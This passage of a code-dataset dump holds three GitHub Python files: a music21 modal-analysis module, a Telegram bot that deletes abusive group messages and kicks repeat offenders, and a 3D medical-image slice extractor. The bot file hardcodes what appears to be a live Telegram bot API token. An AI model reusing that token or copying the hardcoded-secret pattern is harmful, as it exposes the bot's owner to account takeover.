"user.models", "line_number": 67, "usage_type": "name"}, {"api_name": "itsdangerous.TimedJSONWebSignatureSerializer", "line_number": 73, "usage_type": "call"}, {"api_name": "SecondHandMarket.settings.SECRET_KEY", "line_number": 73, "usage_type": "attribute"}, {"api_name": "SecondHandMarket.settings", "line_number": 73, "usage_type": "name"}, {"api_name": "user.models.id", "line_number": 74, "usage_type": "attribute"}, {"api_name": "user.models", "line_number": 74, "usage_type": "name"}, {"api_name": "celery_tasks.tasks.send_register_active_email.delay", "line_number": 79, "usage_type": "call"}, {"api_name": "celery_tasks.tasks.send_register_active_email", "line_number": 79, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 81, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 81, "usage_type": "call"}, {"api_name": "django.views.View", "line_number": 83, "usage_type": "name"}, {"api_name": "itsdangerous.TimedJSONWebSignatureSerializer", "line_number": 86, "usage_type": "call"}, {"api_name": "SecondHandMarket.settings.SECRET_KEY", "line_number": 86, "usage_type": "attribute"}, {"api_name": "SecondHandMarket.settings", "line_number": 86, "usage_type": "name"}, {"api_name": "user.models", "line_number": 91, "usage_type": "name"}, {"api_name": "user.models.User.objects.get", "line_number": 91, "usage_type": "call"}, {"api_name": "user.models.User.objects", "line_number": 91, "usage_type": "attribute"}, {"api_name": "user.models.User", "line_number": 91, "usage_type": "name"}, {"api_name": "user.models.is_active", "line_number": 92, "usage_type": "attribute"}, {"api_name": "user.models", "line_number": 92, "usage_type": "name"}, {"api_name": "user.models.save", "line_number": 93, "usage_type": "call"}, {"api_name": "user.models", "line_number": 93, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 95, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 95, "usage_type": "call"}, {"api_name": "itsdangerous.SignatureExpired", "line_number": 96, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 98, "usage_type": "call"}, {"api_name": "django.views.View", "line_number": 100, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 109, "usage_type": "call"}, {"api_name": "user.models", "line_number": 118, "usage_type": "name"}, {"api_name": "django.contrib.auth.authenticate", "line_number": 118, "usage_type": "call"}, {"api_name": "user.models", "line_number": 119, "usage_type": "name"}, {"api_name": "user.models.is_active", "line_number": 122, "usage_type": "attribute"}, {"api_name": "user.models", "line_number": 122, "usage_type": "name"}, {"api_name": "django.contrib.auth.login", "line_number": 124, "usage_type": "call"}, {"api_name": "user.models", "line_number": 124, "usage_type": "argument"}, {"api_name": "django.urls.reverse", "line_number": 128, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 130, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 144, "usage_type": "call"}, {"api_name": "user.models", "line_number": 149, "usage_type": "name"}, {"api_name": "user.models.User.objects.get", "line_number": 149, "usage_type": "call"}, {"api_name": "user.models.User.objects", "line_number": 149, "usage_type": "attribute"}, {"api_name": "user.models.User", "line_number": 149, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 150, "usage_type": "call"}, {"api_name": "user.models.User.DoesNotExist", "line_number": 151, "usage_type": "attribute"}, {"api_name": "user.models.User", "line_number": 151, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 152, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 158, "usage_type": "call"}, {"api_name": "django.views.View", "line_number": 160, "usage_type": "name"}, {"api_name": "django.contrib.auth.logout", "line_number": 164, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 166, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 166, "usage_type": "call"}, {"api_name": "utils.mixin.LoginRequiredMixin", "line_number": 168, "usage_type": "name"}, {"api_name": "django.views.View", "line_number": 168, "usage_type": "name"}, {"api_name": "user.models", "line_number": 175, "usage_type": "name"}, {"api_name": "user.models.Address.objects.get_default_address", "line_number": 176, "usage_type": "call"}, {"api_name": "user.models", "line_number": 176, "usage_type": "argument"}, {"api_name": "user.models.Address.objects", "line_number": 176, "usage_type": "attribute"}, {"api_name": "user.models.Address", "line_number": 176, "usage_type": "name"}, {"api_name": "django_redis.get_redis_connection", "line_number": 181, "usage_type": "call"}, {"api_name": "user.models.id", "line_number": 183, "usage_type": "attribute"}, {"api_name": "user.models", "line_number": 183, "usage_type": "name"}, {"api_name": "goods.models", "line_number": 200, "usage_type": "name"}, {"api_name": "goods.models.GoodsSKU.objects.get", "line_number": 200, "usage_type": "call"}, {"api_name": "goods.models.GoodsSKU.objects", "line_number": 200, "usage_type": "attribute"}, {"api_name": "goods.models.GoodsSKU", "line_number": 200, "usage_type": "name"}, {"api_name": "goods.models", "line_number": 201, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 213, "usage_type": "call"}, {"api_name": "utils.mixin.LoginRequiredMixin", "line_number": 216, "usage_type": "name"}, {"api_name": "django.views.View", "line_number": 216, "usage_type": "name"}, {"api_name": "user.models", "line_number": 221, "usage_type": "name"}, {"api_name": "order.models.OrderInfo.objects.filter", "line_number": 222, "usage_type": "call"}, {"api_name": "order.models.OrderInfo.objects", "line_number": 222, "usage_type": "attribute"}, {"api_name": "order.models.OrderInfo", "line_number": 222, "usage_type": "name"}, {"api_name": "user.models", "line_number": 222, "usage_type": "name"}, {"api_name": "order.models", "line_number": 225, "usage_type": "name"}, {"api_name": "order.models.OrderGoods.objects.filter", "line_number": 227, "usage_type": "call"}, {"api_name": "order.models.OrderGoods.objects", "line_number": 227, "usage_type": "attribute"}, {"api_name": "order.models.OrderGoods", "line_number": 227, "usage_type": "name"}, {"api_name": "order.models.order_id", "line_number": 227, "usage_type": "attribute"}, {"api_name": "order.models", "line_number": 227, "usage_type": "name"}, {"api_name": "order.models.status_name", "line_number": 237, "usage_type": "attribute"}, {"api_name": "order.models", "line_number": 237, "usage_type": "name"}, {"api_name": "order.models.OrderInfo.ORDER_STATUS", "line_number": 237, "usage_type": "attribute"}, {"api_name": "order.models.OrderInfo", "line_number": 237, "usage_type": "name"}, {"api_name": "order.models.order_status", "line_number": 237, "usage_type": "attribute"}, {"api_name": "order.models.order_skus", "line_number": 239, "usage_type": "attribute"}, {"api_name": "order.models", "line_number": 239, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 242, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 277, "usage_type": "call"}, {"api_name": "utils.mixin.LoginRequiredMixin", "line_number": 281, "usage_type": "name"}, {"api_name": "django.views.View", "line_number": 281, "usage_type": "name"}, {"api_name": "user.models", "line_number": 286, "usage_type": "name"}, {"api_name": "user.models.Address.objects.get_default_address", "line_number": 294, "usage_type": "call"}, {"api_name": "user.models", "line_number": 294, "usage_type": "argument"}, {"api_name": "user.models.Address.objects", "line_number": 294, "usage_type": "attribute"}, {"api_name": "user.models.Address", "line_number": 294, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 297, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 309, "usage_type": "call"}, {"api_name": "re.match", "line_number": 312, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 313, "usage_type": "call"}, {"api_name": "user.models", "line_number": 318, "usage_type": "name"}, {"api_name": "user.models.Address.objects.get_default_address", "line_number": 326, "usage_type": "call"}, {"api_name": "user.models", "line_number": 326, "usage_type": "argument"}, {"api_name": "user.models.Address.objects", "line_number": 326, "usage_type": "attribute"}, {"api_name": "user.models.Address", "line_number": 326, "usage_type": "name"}, {"api_name": "user.models.Address.objects.create", "line_number": 334, "usage_type": "call"}, {"api_name": "user.models.Address.objects", "line_number": 334, "usage_type": "attribute"}, {"api_name": "user.models.Address", "line_number": 334, "usage_type": "name"}, {"api_name": "user.models", "line_number": 334, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 342, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 342, "usage_type": "call"}]} +{"seq_id": "2891023250", "text": "from collections import Counter\nimport re\nfrom music21 import *\nfrom sklearn.preprocessing import MinMaxScaler\nimport statistics\nimport numpy as np\nfrom base import OrderedCounter\n\n#predominancia de movimiento descendente???\n\ndef count_intervals(s):\n ntbefore = None\n\n for num, i in enumerate(obj):\n \n if isinstance(i, note.Rest):\n cnt = cnt + 1\n tmp_string.append('=P')\n \n elif isinstance(i, note.Note):\n cnt = cnt + 1\n if ntbefore is None:\n ntbefore = i.pitch.name\n else:\n inv = interval.Interval(note.Note(ntbefore), note.Note(i.pitch.name))\n invs = inv.semitones\n if invs > 0:\n invs = '+' + str(invs)\n elif invs == 0:\n invs = '=' + str(invs)\n else:\n invs = str(invs)\n tmp_string.append(invs)\n ntbefore = i.pitch.name\n \n elif isinstance(i, chord.Chord):\n cnt = cnt + 1\n ch = i.getChordStep(1).name\n inv = interval.Interval(note.Note(ntbefore), ch)\n invs = inv.semitones\n tmp_string.append(invs)\n ntbefore = ch\n\n else:\n if isinstance(i, stream.Part):\n if num == 0:\n continue\n \n else:\n cnt = 0\n ngram_list.append(tmp_string)\n tmp_string = list()\n continue\n\n else:\n pass\n\n ngram_list.append(tmp_string)\n\n for i in ngram_list:\n voice = seq_ngrams(i, number_grams)\n idx = ngram_list.index(i)\n ngram_list.pop(idx)\n ngram_list.insert(idx, voice)\n\n\n # Lo siguiente va en el cuaderno\n\n dict1 = Counter(ngram_list[0])\n dict2 = Counter(ngram_list[1])\n dict3 = Counter(ngram_list[2])\n dict4 = Counter(ngram_list[3])\n\n print(dict1.most_common()[-1])\n\ndef rec_notas(s, finalis):\n\n snotes = sorted([x.name for x in s.recurse().getElementsByClass('Note')])\n notes_ordered = list()\n tmp = list()\n cond = False\n\n for i in snotes:\n if cond is False:\n if i == finalis:\n cond = True\n notes_ordered.append(i)\n else:\n tmp.append(i)\n else:\n notes_ordered.append(i)\n\n if len(tmp) > 0:\n notes_ordered = notes_ordered + tmp\n else:\n pass\n\n\n nt_dict = OrderedCounter(notes_ordered)\n\n return nt_dict\n\ndef ambito(s):\n amb = analysis.discrete.Ambitus(s)\n amb = amb.getPitchSpan(s)\n result = amb[0].nameWithOctave + ' - ' + amb[1].nameWithOctave\n if interval.Interval(amb[0].nameWithOctave, amb[1].nameWithOctave).semitones <= 33:\n return result, 'a voce piena'\n else: return result, 'ad aequales'\n\ndef ambito_per_voice(score, x):\n dct = {'superius': 0, 'altus': 1, 'tenor': 2, 'bassus': 3}\n part = score.parts[dct[x]]\n amb = analysis.discrete.Ambitus(part)\n amb = amb.getPitchSpan(part)\n return [amb[0], amb[1]]\n\ndef get_finalis(s):\n\n sc = s.chordify()\n schords = sc.recurse().getElementsByClass('Chord')\n finalis = schords[-1].getChordStep(1)\n return finalis\n\ndef armadura(s):\n alt = [i.name for i in s[key.KeySignature].first().alteredPitches]\n return alt\n\ndef armadura_comparada(s, x):\n s = s.recurse().getElementsByClass('Note')\n count = {}\n for z in x:\n weight_alt = 0\n weight_nat = 0\n for i in s:\n nm = i.name\n nm_natural = i.name[0]\n\n if nm == z:\n weight_alt = float(weight_alt) + i.quarterLength\n count[z] = weight_alt\n \n if nm_natural == z:\n weight_nat = float(weight_nat) + i.quarterLength \n count[z] = weight_nat\n\n if weight_alt >= weight_nat:\n pass\n else:\n x.remove(z)\n x.append(z[0])\n return x\n\ndef intervals(alt, natural_scale, finalis):\n scale = list()\n lst_ordered = list()\n if len(alt) == 0:\n index = natural_scale.index(finalis)\n lst_ordered = natural_scale[index:] + natural_scale[:index]\n else:\n alt_type = alt[0][-1]\n tmp = [i[:1] for i in alt]\n for i in natural_scale:\n if i in tmp: scale.append(i + alt_type)\n else: scale.append(i)\n\n index = scale.index(finalis)\n lst_ordered = list(scale[index:] + scale[:index])\n\n intervals = [interval.Interval(note.Note(x), note.Note(lst_ordered[n+1])).semitones\\\n for n, x in enumerate(lst_ordered) if n < len(lst_ordered)-1]\n \n if -10 in intervals:\n idx = intervals.index(-10)\n intervals[idx] = 2\n elif -11 in intervals:\n idx = intervals.index(-11)\n intervals[idx] = 1\n\n return [intervals, lst_ordered]\n\n\ndef calcs_mode(s, alt, natural_scale, natural_mode, finalis, mode_basis, transposed=None):\n \n lst_ordered = intervals(alt, natural_scale, finalis)[1]\n #condicionales para comprobar el ambito del tenor y del soprano\n #si el modo es autentico\n tenor_lowest = ambito_per_voice(s, 'tenor')[0]\n soprano_lowest = ambito_per_voice(s, 'superius')[0]\n\n if tenor_lowest.name == finalis or soprano_lowest.name == finalis:\n if mode_basis is False:\n return natural_mode[finalis]\n else:\n return str(transposed) + f' sobre {finalis}'\n \n elif tenor_lowest.name == lst_ordered[-1] or\\\n soprano_lowest.name == lst_ordered[-1]:\n if mode_basis is False:\n return natural_mode[finalis]\n else:\n return str(transposed) + f' sobre {finalis}'\n\n \n #para abrir la posibilidad a modos plagales.\n #diferenciar tetrardus plagal del protus auténtico.\n elif tenor_lowest.name in lst_ordered[3:5] or\\\n soprano_lowest.name in lst_ordered[3:5]:\n if mode_basis is False:\n return natural_mode[finalis] + ' plagal'\n else:\n if transposed == 'Protus':\n transposed = 'Tetrardus plagal'\n return str(transposed) + f' sobre {finalis}'\n else: return str(transposed) + f' sobre {finalis}'\n\n elif tenor_lowest.name in lst_ordered[3:5] or\\\n soprano_lowest.name in lst_ordered[3:5]:\n if mode_basis is False:\n return natural_mode[finalis] + ' plagal'\n else:\n if transposed == 'Protus':\n transposed = 'Tetrardus plagal'\n return str(transposed) + f' sobre {finalis}'\n else: return str(transposed) + f' sobre {finalis}'\n \n elif finalis == 'F' and tenor_lowest.name == 'B-'\\\n or finalis == 'F' and soprano_lowest.name == 'B-':\n if mode_basis is False:\n return natural_mode[finalis]\n else:\n if transposed == 'Protus':\n transposed = 'Tetrardus plagal'\n return str(transposed) + f' sobre {finalis}'\n else: return str(transposed) + f' sobre {finalis}'\n\n\ndef get_mode(s, finalis):\n natural_scale = ['C', 'D', 'E', 'F', 'G', 'A', 'B']\n modes = {\"[2, 1, 2, 2, 2, 1]\": 'Protus', \"[2, 1, 2, 2, 1, 2]\": 'Protus plagal', \"[1, 2, 2, 2, 1, 2]\": 'Deuterus', \"[1, 2, 2, 1, 2, 2]\": 'Deuterus plagal',\\\n \"[2, 2, 2, 1, 2, 2]\": 'Tritus', \"[2, 2, 1, 2, 2, 2]\": 'Tritus plagal', \"[2, 2, 1, 2, 2, 1]\": 'Tetrardus'}\n natural_mode = {'D': 'Protus', 'E': 'Deuterus', 'F': 'Tritus', 'G': 'Tetrardus'}\n alt = armadura_comparada(s, armadura(s))\n \n if len(alt) == 0:\n try:\n calcs = calcs_mode(s, alt, natural_scale, natural_mode, finalis, mode_basis=False)\n return calcs\n except:\n try:\n ivls = intervals(alt, natural_scale, finalis)\n tr = modes[str(ivls[0])]\n calcs = calcs_mode(s, alt, natural_scale, natural_mode, finalis, mode_basis=True)\n return calcs\n except:\n alternativa = f'Cierta escala sobre {finalis}'\n return alternativa\n else:\n try:\n ivls = intervals(alt, natural_scale, finalis)\n tr = modes[str(ivls[0])]\n alternativa = calcs_mode(s, alt, natural_scale, natural_mode, finalis, mode_basis=True, transposed=tr)\n return alternativa\n \n except:\n #aquí el problema es que a veces puede haber una alteración que realmente es para avisar de la semitonía,\n #pero no es parte del modo. Conteo de qué versión aparece más en la obra, y tomar esa como base para el cálculo.\n alternativa = f'Cierta escala sobre {finalis}'\n return alternativa\n\n\ndef mean_note(s, x):\n dct = {'superius': 0, 'altus': 1, 'tenor': 2, 'bassus': 3}\n part = s.parts[dct[x]]\n rs = statistics.median([p.ps for p in part.pitches])\n rs = pitch.Pitch(rs)\n return rs.nameWithOctave\n\n\ndef MT_relation(s, voice):\n rs_dct = dict()\n v = s.parts[voice]\n allText = text.assembleLyrics(v)\n ls = search.lyrics.LyricSearcher(v)\n lst = allText.split()\n lst = [i[:-1] if bool(re.search(',', i)) == True or bool(re.search('\\\\.', i)) == True else i for i in lst]\n lst2 = set(lst)\n\n for i in lst2:\n sts_tmp = list()\n rs = ls.search(i)\n allRelevantNotes = None\n ########\n for x in range(0, len(rs)):\n firstNote = rs[x].els[0]\n lastNote = rs[x].els[-1]\n\n allRelevantNotes = [firstNote]\n currentNote = firstNote\n idd = lastNote.id\n ints = 0\n\n while currentNote is not None:\n currentNote = currentNote.next('Note')\n allRelevantNotes.append(currentNote)\n if currentNote is lastNote:\n break\n\n for n, z in enumerate(v.recurse()):\n if z.id == idd:\n try:\n if z.next('Note').lyric is None:\n z = z.next('Note')\n idd = z.id\n allRelevantNotes.append(z)\n else:\n break\n except:\n break\n \n for n, nt in enumerate(allRelevantNotes):\n if n == len(allRelevantNotes)-1:\n break\n int1 = interval.Interval(note.Note(nt.nameWithOctave), note.Note(allRelevantNotes[n + 1].nameWithOctave))\n sts = int1.semitones\n sts_tmp.append(sts)\n scaler = MinMaxScaler(feature_range=(-1, 1))\n scaled = scaler.fit_transform([[x] for x in sts_tmp])\n rs_dct.update({i: np.mean(scaled)})\n \n return rs_dct\n", "repo_name": "PabloLRmusic/Notebooks", "sub_path": "melodia_general.py", "file_name": "melodia_general.py", "file_ext": "py", "file_size_in_byte": 10881, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "collections.Counter", "line_number": 69, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 70, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 71, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 72, "usage_type": "call"}, {"api_name": "base.OrderedCounter", "line_number": 99, "usage_type": "call"}, {"api_name": "statistics.median", "line_number": 275, "usage_type": "call"}, {"api_name": "re.search", "line_number": 286, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 327, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 329, "usage_type": "call"}]} +{"seq_id": "36201769440", "text": "import Ngram\nimport database\nimport telebot\n\nfrom telebot import apihelper\nfrom os import path\nfrom time import sleep\n\nngram = Ngram.Ngram()\n\n###################### Set the Training Data ######################\n# Count Total Data Abusive & Slangword, then convert them to JSON\nif not path.exists('data json/total_data.json'):\n total_abusive = database.count_row(\"abusive\")\n total_slangword = database.count_row(\"slangword\")\n total_both = {'abusive': total_abusive, 'slangword': total_slangword}\n ngram.jsonConverter(\"data json/total_data.json\",\n total_both, \"convert\", None)\n\n# Get Data Abusive From Database & Convert them to JSON\nif not path.exists('data json/data_abusive.json'):\n abusive = database.get_all(\"abusive\")\n ngram.jsonConverter(\"data json/data_abusive.json\",\n abusive, \"convert\", None)\n\n# Get Data Slangword From Database & Convert them to JSON\nif not path.exists('data json/data_slangword.json'):\n slangword = database.get_all(\"slangword\")\n ngram.jsonConverter(\"data json/data_slangword.json\",\n slangword, \"convert\", None)\n\n# Train Model Ngram (Bi&Tri)\ndataset_limit = 1500\nif not path.exists('data json/trigram_train.json'):\n ngram.trainData(3, dataset_limit, \"data json/trigram_train.json\")\n\n###################### Set the Testing Data ######################\nstart_dataset = ngram.getRatioDataset(dataset_limit, 0.7)\noffset = ngram.getRatioDataset(dataset_limit, 0.3)\nt = 0.3\n\n# Get Data Abusive & Slangword from JSON\nget_abusive_from_json = ngram.jsonConverter(\n \"data json/data_abusive.json\", None, \"load\", None)\ndata_abusive = ngram.getAbusiveData(get_abusive_from_json)\ndata_slang = ngram.jsonConverter(\n \"data json/data_slangword.json\", None, \"load\", None)\n\nobj_dataset = ngram.getDataset(\n database.get_per_page(\"dataset\", start_dataset, offset))\nobj_re_dataset = ngram.checkEmoji(obj_dataset)\nobj_tokenize = ngram.tokenizing(obj_re_dataset)\nobj_replace = ngram.replacing(obj_tokenize, data_slang, data_abusive)\nobj_filter = ngram.filtering(obj_replace)\nobj_stem = ngram.stemming(obj_filter)\n\n\n# Telegram Bot\napi = '1604887518:AAEAagkqtki4thLoviQrfzjAS0bv8vC1m7Q'\nbot = telebot.TeleBot(api)\n\napihelper.SESSION_TIME_TO_LIVE = 5 * 60\n\n\n@bot.message_handler(commands=['start'])\ndef send_welcome(message):\n bot.send_message(message.chat.id, \"\"\"\\\n Silakan kirim pesan ke saya. Saya akan coba olah pesan anda.\\\n \"\"\")\n\n\n@bot.message_handler(commands=['help'])\ndef send_stop(message):\n bot.send_message(\n message.chat.id, \"\\\\- Bot ini merupakan bot filter chat yang mana bot ini akan mem\\\\-filter semua chat yang mengandung kata kasar\\\\. \\n\\n\\\\- Jika bot ini dimasukkan ke dalam grup, bot dapat menghapus chat yang mengandung kata kasar di dalam grup\\\\.\\n\\n*Note: Fitur hapus pesan hanya bekerja dalam grup chat dan posisi bot menjadi administrator\\\\!*\", parse_mode='MarkdownV2')\n\n\n@bot.message_handler(commands=['stop'])\ndef send_stop(message):\n bot.send_message(\n message.chat.id, \"Iri bilang bos, yahaayyyukk pal pale pale pal pale pale...\")\n\n\n@bot.message_handler(func=lambda m: True)\ndef re_msg(message):\n # Do Pre-processing Message\n def msg(): return ([message.text])\n ngram.botPreprocessing(msg, data_slang, data_abusive)\n obj_result = list(ngram.testData(\n 2, None, obj_stem, None, data_slang, \"bot\", t))\n # To Get Group Chat, set the privacy to DISABLED in BotFather\n print(\"message detail:\", message)\n\n combined_result = \"@%s said '%s'\" % (\n message.from_user.username, obj_result[0])\n\n print(combined_result)\n\n if message.chat.type == \"group\":\n if ngram.shouldWeDelete():\n database.add_message_bot(message.text, message.from_user.id)\n bot.send_message(message.chat.id, combined_result,\n parse_mode='MarkdownV2')\n bot.delete_message(message.chat.id, message.message_id)\n counter = database.count_penalty(message.from_user.id)\n if counter > 3:\n bot.kick_chat_member(message.chat.id, message.from_user.id)\n database.del_all_message(message.from_user.id)\n\n elif message.chat.type == \"private\":\n bot.send_message(message.chat.id, obj_result,\n parse_mode='MarkdownV2')\n\n\n# while True:\ntry:\n print(\"Bot is running\")\n bot.polling(none_stop=True)\nexcept [ConnectionError, ConnectionResetError]:\n sleep(300)\n", "repo_name": "wayhdyh98/TelebotMind", "sub_path": "bot.py", "file_name": "bot.py", "file_ext": "py", "file_size_in_byte": 4491, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "Ngram.Ngram", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "name"}, {"api_name": "database.count_row", "line_number": 14, "usage_type": "call"}, {"api_name": "database.count_row", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "name"}, {"api_name": "database.get_all", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "name"}, {"api_name": "database.get_all", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path", "line_number": 34, "usage_type": "name"}, {"api_name": "database.get_per_page", "line_number": 50, "usage_type": "call"}, {"api_name": "telebot.TeleBot", "line_number": 60, "usage_type": "call"}, {"api_name": "telebot.apihelper.SESSION_TIME_TO_LIVE", "line_number": 62, "usage_type": "attribute"}, {"api_name": "telebot.apihelper", "line_number": 62, "usage_type": "name"}, {"api_name": "database.add_message_bot", "line_number": 101, "usage_type": "call"}, {"api_name": "database.count_penalty", "line_number": 105, "usage_type": "call"}, {"api_name": "database.del_all_message", "line_number": 108, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 120, "usage_type": "call"}]} +{"seq_id": "16058156360", "text": "#!/usr/bin/env python\n\n''' \nThis script extracts 2D image slices from a 3D image volume. \n'''\nimport argparse\nimport sys\nimport os\nimport logging\n\nfrom manage import get_logger_name, init_logging, get_log_file_name\nimport numpy as np\nfrom parameters import Parameters\nfrom image import Image\nfrom graphics import Graphics\nfrom model import Model \nfrom path import Path \n\nlogger = logging.getLogger(get_logger_name())\n\nclass Args(object):\n ''' This class defines the command line arguments to the generate-1d-mesh script.\n '''\n PREFIX = \"--\"\n ENABLE_GRAPHICS = \"enable_graphics\"\n EXTRACT_SLICES = \"extract_slices\"\n IMAGE_FILE = \"image_file_name\"\n MODEL_FILE = \"model_file_name\"\n PATH_FILE = \"path_file_name\"\n PATH_SAMPLE_METHOD = \"path_sample_method\"\n RESULTS_DIRECTORY = \"results_directory\"\n SLICE_INCREMENT = \"slice_increment\"\n SLICE_WIDTH = \"slice_width\"\n\ndef cmd(name):\n ''' Create an argparse command argument.\n '''\n return Args.PREFIX + name.replace(\"_\", \"-\")\n\ndef parse_args():\n ''' Parse command-line arguments.'''\n parser = argparse.ArgumentParser()\n\n parser.add_argument(cmd(Args.ENABLE_GRAPHICS), help=\"Enable graphics to show geomemtry in a graphics window.\")\n parser.add_argument(cmd(Args.EXTRACT_SLICES), help=\"Automatically extract slices using the slice increment.\")\n parser.add_argument(cmd(Args.IMAGE_FILE), help=\"The image (.vti) file.\")\n parser.add_argument(cmd(Args.MODEL_FILE), help=\"The model (.vtp) file.\")\n parser.add_argument(cmd(Args.PATH_FILE), help=\"The path (.pth) file.\")\n parser.add_argument(cmd(Args.PATH_SAMPLE_METHOD), help=\"The method used to sample path points: number, distance\")\n parser.add_argument(cmd(Args.RESULTS_DIRECTORY), help=\"The directory to write image slice and model slice files.\")\n parser.add_argument(cmd(Args.SLICE_INCREMENT), help=\"The slice increment along a path.\")\n parser.add_argument(cmd(Args.SLICE_WIDTH), help=\"The width of a slice plane.\")\n\n return parser.parse_args(), parser.print_help\n\ndef set_parameters(**kwargs):\n ''' Set the values of parameters input from the command line.\n '''\n print(kwargs)\n logger.info(\"Parse arguments ...\")\n\n ## Create a Parameters object to store parameters.\n params = Parameters()\n\n ## Process arguments.\n #\n if kwargs.get(Args.ENABLE_GRAPHICS):\n params.enable_graphics = kwargs.get(Args.ENABLE_GRAPHICS) in ['true', 'True']\n\n if kwargs.get(Args.EXTRACT_SLICES):\n params.extract_slices = kwargs.get(Args.EXTRACT_SLICES) in ['true', 'True']\n\n if kwargs.get(Args.IMAGE_FILE):\n params.image_file_name = kwargs.get(Args.IMAGE_FILE)\n logger.info(\"Image file: %s\" % params.image_file_name)\n if not os.path.exists(params.image_file_name):\n logger.error(\"The image file '%s' was not found.\" % params.image_file_name)\n return None\n\n if kwargs.get(Args.MODEL_FILE):\n params.model_file_name = kwargs.get(Args.MODEL_FILE)\n logger.info(\"Model file: %s\" % params.model_file_name)\n if not os.path.exists(params.model_file_name):\n logger.error(\"The model file '%s' was not found.\" % params.model_file_name)\n return None\n\n if kwargs.get(Args.PATH_FILE):\n params.path_file_name = kwargs.get(Args.PATH_FILE)\n logger.info(\"Path file: %s\" % params.path_file_name)\n if not os.path.exists(params.path_file_name):\n logger.error(\"The path file '%s' was not found.\" % params.path_file_name)\n return None\n\n if kwargs.get(Args.PATH_SAMPLE_METHOD):\n params.path_sample_method = kwargs.get(Args.PATH_SAMPLE_METHOD)\n\n if kwargs.get(Args.RESULTS_DIRECTORY):\n params.results_directory = kwargs.get(Args.RESULTS_DIRECTORY)\n\n if kwargs.get(Args.SLICE_INCREMENT):\n params.slice_increment = int(kwargs.get(Args.SLICE_INCREMENT))\n logger.info(\"Slice increment: %d\" % params.slice_increment)\n\n if kwargs.get(Args.SLICE_WIDTH):\n params.slice_width= float(kwargs.get(Args.SLICE_WIDTH))\n logger.info(\"Slice width: %g\" % params.slice_width)\n\n return params\n\nif __name__ == '__main__':\n init_logging()\n args, print_help = parse_args()\n params = set_parameters(**vars(args))\n if not params:\n logger.error(\"Error in parameters.\")\n sys.exit(1)\n\n ## Create graphics interface. \n graphics = Graphics(params, params.enable_graphics)\n\n ## Read in the volume image.\n image = Image(params)\n image.graphics = graphics\n image.read_volume()\n image.display_edges()\n graphics.image = image\n\n ## Show some slices in ijk.\n #image.display_axis_slice('i', 255)\n #image.display_axis_slice('j', 30)\n #image.display_axis_slice('k', 255)\n\n ## Read in and display paths.\n paths = Path.read_path_file(params, graphics)\n graphics.paths = paths \n for path in paths:\n path.create_path_geometry()\n\n ## Read in and display model.\n model = Model(params, graphics)\n model.read_model_file()\n model.create_model_geometry()\n graphics.model = model\n\n if params.extract_slices:\n graphics.auto_slice()\n\n ## Show image, paths and model. \n graphics.show()\n\n", "repo_name": "ktbolt/cardiovascular", "sub_path": "extract-2d-images/python/extact-2d-images.py", "file_name": "extact-2d-images.py", "file_ext": "py", "file_size_in_byte": 5207, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "86", "api": [{"api_name": "logging.getLogger", "line_number": 19, "usage_type": "call"}, {"api_name": "manage.get_logger_name", "line_number": 19, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 42, "usage_type": "call"}, {"api_name": "parameters.Parameters", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path", "line_number": 76, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path", "line_number": 83, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path", "line_number": 90, "usage_type": "attribute"}, {"api_name": "manage.init_logging", "line_number": 111, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 116, "usage_type": "call"}, {"api_name": "graphics.Graphics", "line_number": 119, "usage_type": "call"}, {"api_name": "image.Image", "line_number": 122, "usage_type": "call"}, {"api_name": "image.graphics", "line_number": 123, "usage_type": "attribute"}, {"api_name": "image.read_volume", "line_number": 124, "usage_type": "call"}, {"api_name": "image.display_edges", "line_number": 125, 